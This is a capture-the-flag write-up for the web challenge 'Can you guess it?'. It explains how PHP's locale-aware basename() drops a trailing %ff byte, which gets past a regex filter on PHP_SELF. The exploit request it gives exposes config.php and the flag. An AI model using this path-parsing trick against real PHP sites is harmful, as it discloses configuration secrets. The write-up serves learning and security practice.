Tags: web basename 


# ▼▼▼Can you guess it?(Web, 338pts, 44/432=10.2%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

※Number of teams that answered one or more questions, **excluding Survey and Welcome**: 218



## 【Check source code】


<html lang="en">
<meta charset="utf-8">
<title>Can you guess it?</title>
<h1>Can you guess it?</h1>

If your guess is correct, I'll give you the flag.



<form action="index.php" method="POST">
<input type="text" name="guess">
<input type="submit">

`$message = 'Congratulations! The flag is: ' . FLAG;` ⇒FLAG is likely in config.php

`if (hash_equals($secret, $guess)) {` ⇒ A is almost impossible to satisfy the condition


include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
exit("I don't know what you are thinking, but I won't let you read it :)");

if (isset($_GET['source'])) {

Check the specification of **basename()**



basename() is locale aware, so for it to see the correct basename with multibyte character paths,
the matching locale must be set using the setlocale() function.


## 【exploit】
GET /index.php/config.php/%ff?source HTTP/1.1

define</span><span>(</span><span>'FLAG'</span><span>, </span><span>'zer0pts{gu3ss1ng_r4nd0m_by73s_1s_un1n73nd3d_s0lu710n}'</span><span>);</span>